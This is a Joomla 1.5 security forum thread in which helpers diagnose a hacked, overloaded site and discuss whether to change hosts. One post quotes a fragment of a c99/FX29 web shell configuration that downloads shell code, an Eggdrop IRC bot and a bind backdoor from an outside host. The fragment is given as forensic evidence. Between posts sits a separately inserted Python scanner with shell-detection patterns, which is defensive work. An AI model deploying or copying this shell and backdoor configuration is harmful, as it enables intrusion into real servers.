Malware/Maybe Hack Causing Host Server to Get Overload

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

PhilD
Joomla! Hero
Posts: 2735
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by PhilD » Sat Jun 04, 2011 3:18 pm

@webdongle etc..

"You also need to remove every file, cron job, sub domains, directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account. There are several scripts here

an injector script and an uploader script:

{HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"[removed]" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.
PhilD
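As an added, defender-side illustration (not code from the thread or from any of its participants): a small Python scan that walks a Joomla 1.5 tree and flags PHP files sitting in asset-only directories such as media/ (where the post found cfg.php and upload.php) and files carrying the markers seen in the quoted shell fragment. The sample tree, the example.invalid URL and the marker list are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Joomla 1.5 directories that should hold only static assets; any .php file
# beneath them is suspicious (the thread found cfg.php/upload.php under media/system).
ASSET_DIRS = {"media", "images", "cache", "tmp", "logs"}

# Markers from the shell fragment quoted in the thread, plus eval(base64_decode()).
SHELL_MARKERS = [
    ("sh_mainurl", re.compile(rb"\$sh_mainurl\s*=")),
    ("fx29sh", re.compile(rb"fx29sh", re.I)),
    ("c99", re.compile(rb"c99(_update)?\.(php|txt)")),
    ("eval-base64", re.compile(rb"eval\s*\(\s*base64_decode\s*\(")),
]

def scan_site(root):
    """Return a sorted list of (relative_path, reason) for suspicious PHP files."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        if rel.split("/", 1)[0] in ASSET_DIRS:
            findings.append((rel, "php-in-asset-dir"))
        data = path.read_bytes()
        for label, pattern in SHELL_MARKERS:
            if pattern.search(data):
                findings.append((rel, "marker:" + label))
                break  # one marker hit per file is enough to flag it
    return sorted(findings)

def build_sample_site():
    """Constructed sample tree (not a real site) mirroring the layout in the thread."""
    root = Path(tempfile.mkdtemp())
    files = {
        "index.php": b"<?php define('_JEXEC', 1); ?>",
        "media/system/cfg.php": b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>",
        "media/system/upload.php": b"<?php $sh_mainurl = 'http://example.invalid/xml/'; ?>",
        "media/system/js/mootools.js": b"// legitimate asset, not PHP",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)
    return str(root)

if __name__ == "__main__":
    for rel, reason in scan_site(build_sample_site()):
        print(f"{reason:20} {rel}")
```

Run it against a copy of the restored backup as well as the live tree; the post notes the backups themselves carried the same scripts, so a clean-looking live site restored from them comes back infected.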

leolam
Joomla! Master
Posts: 20518
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by leolam » Sat Jun 04, 2011 4:04 pm

PhilD wrote:These are the reasons I stated what I did as a plan of action.
to which I agree completely, and he should change hosts as well imho, despite the host being very helpful. One cannot take the risk after all these events and the experience described to renew a Joomla site with the same host....No offense to the host as such, but you simply cannot take the risk, as habledash is expressing his own doubts!

@ habledash: No reason for me to take WP over Joomla...from a security point of view it makes no difference....Bluehost I would investigate a little bit longer......Contact me via PMB to share some client experiences, since I do not wish to get PhilD all over me with a "wall of hosting shame" (Sorry Phil..could not resist a little joke.......don't take it all too seriously.....)

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

Webdongle
Joomla! Master
Posts: 41878
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by Webdongle » Sat Jun 04, 2011 5:48 pm

Webdongle wrote:.....

Also some Hosting companies are well known for being hacked on a regular basis
Try a google search for
yourhost hacked
Here are the results
http://www.google.co.uk/search?q=Blueho ... e=off&tbs=
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

leolam
Joomla! Master
Posts: 20518
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by leolam » Sat Jun 04, 2011 5:56 pm

@ Webdongle
With all respect to your intentions and the facts, please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....

If you would like to open a thread about experiences with whatever host, feel free, and it will be welcomed since these issues are important......However, placing them in this thread is beyond topic imho

I restrained myself, as you can see from my post...no need at all to post links to that particular host in the thread (!)

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

Webdongle
Joomla! Master
Posts: 41878
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by Webdongle » Sat Jun 04, 2011 6:39 pm

leolam wrote:....
With all respect to your intentions and the facts please stay on topic....Your contribution adds to a "wall of shame" which does not belong in this thread.....
....
IMHO it is on topic and is not a 'Hall of shame'; it is part of a diagnostic process. "Once you eliminate the impossible, whatever remains, no matter how improbable, must be the truth." Sir Arthur Conan Doyle.

The OP has eliminated everything else; a search on his Host with the word 'Hacked' is that which remained. The search linked to was the next step in the process of elimination. Pasting the link does not name and shame because it makes no conclusion about the Host. It merely shows a link to the results of such a search. Therefore it is part of the analytical process and not a hall of shame. And as such is very relevant to the thread.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

randelld
Joomla! Explorer
Posts: 418
Joined: Thu Jan 31, 2008 8:45 am

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by randelld » Sat Jun 04, 2011 9:16 pm

I think Webdongle was right to post the above link. It definitely is relevant with regard to the OP making a decision to change hosts or not.
It looks pretty conclusive in my opinion what the next step should be.

PhilD
Joomla! Hero
Posts: 2735
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Malware/Maybe Hack Causing Host Server to Get Overload

Post by PhilD » Sun Jun 12, 2011 12:35 pm

The OP had active on the domain a c99 script variant, an uploader script and an eggdrop script. The site had backups, both by the host and by the individual. However, these backups were all infected with the above scripts. The site has been cleaned, a much better host (mod_security etc.) has been selected to host the site, and the site is being monitored.

The database errors and other database issues were due to an excessively large sessions table. This has also been taken care of.

Edit: The host also was not BlueHost
PhilD
